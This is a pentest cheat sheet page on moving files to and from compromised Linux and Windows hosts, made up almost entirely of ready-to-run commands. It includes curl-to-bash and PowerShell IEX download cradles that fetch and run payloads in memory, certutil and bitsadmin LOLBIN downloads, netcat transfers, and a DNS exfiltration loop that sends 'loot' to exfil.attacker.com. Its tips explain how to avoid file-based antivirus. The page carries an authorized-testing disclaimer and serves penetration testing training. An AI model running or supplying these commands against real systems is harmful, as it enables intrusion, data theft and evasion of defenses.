CyberCheatsheets

File Transfer Cheat Sheet

Move files to and from compromised Linux and Windows hosts — HTTP, SMB, netcat, base64, and living-off-the-land binaries.

Utilities & Shellsexfiltrationfile-transferlolbinspentestpost-exploitationUpdated 2026-06-17

Overview

Getting tools onto a target and data back off is a constant pentest task. The right method depends on what's installed and what egress is allowed. This sheet covers serving files, downloading with built-in binaries (LOLBINs), and clever fallbacks when normal transfers are blocked.

Authorized testing only. Transfer files only on systems you own or have explicit written permission to test.

Serve files from your box

Quick HTTP server for the current directory

python3 -m http.server 8000

Bind to a specific interface

python3 -m http.server 8000 --bind 10.10.14.5

SMB server (great for Windows targets)

impacket-smbserver share . -smb2support

Authenticated SMB (newer Windows requires it)

impacket-smbserver share . -smb2support -user u -password p

PHP built-in server (alternative)

php -S 0.0.0.0:8000

Download to Linux

wget

wget http://10.10.14.5:8000/linpeas.sh -O /tmp/lp.sh

curl

curl http://10.10.14.5:8000/lp.sh -o /tmp/lp.sh

Run straight from memory (no disk write)

curl http://10.10.14.5:8000/lp.sh | bash

scp (when you have SSH creds)

scp file user@10.10.14.5:/tmp/

Download to Windows

certutil LOLBIN download

certutil -urlcache -split -f http://10.10.14.5:8000/nc.exe nc.exe

PowerShell Invoke-WebRequest

powershell iwr http://10.10.14.5:8000/nc.exe -OutFile nc.exe

In-memory PowerShell cradle

powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5:8000/p.ps1')

Copy from your SMB share

copy \\10.10.14.5\share\nc.exe .

bitsadmin LOLBIN

bitsadmin /transfer j http://10.10.14.5:8000/f.exe C:\Windows\Temp\f.exe

Netcat transfer (no HTTP/SMB)

Receiver listens and writes the file

nc -lvnp 9001 > out.bin

Sender pushes the file

nc 10.10.14.5 9001 < file.bin

With ncat + TLS (encrypted)

ncat --ssl -lvnp 9001 > out.bin   #   ncat --ssl 10.10.14.5 9001 < file.bin

Fallbacks when transfers are blocked

Base64 a small file, paste it into the shell, decode

base64 -w0 file.bin    # then on target:  echo <b64> | base64 -d > file.bin

Windows base64 decode (certutil)

certutil -decode b64.txt file.bin

Exfiltrate over DNS when only DNS egress works

for c in $(base64 -w0 loot | fold -w50); do nslookup $c.exfil.attacker.com; done

Pull a file out via an existing SSH session (reverse scp)

scp user@target:/path/loot .

Tips

  • On modern Windows, impacket-smbserver needs -smb2support and often auth — set a user/password.
  • Pipe straight to bash/iex to avoid writing to disk and tripping file-based AV.
  • certutil and bitsadmin are signed LOLBINs — they download even when PowerShell is locked down.
  • base64-paste is the universal fallback for small files when no network transfer works.

References

Chuletas relacionadas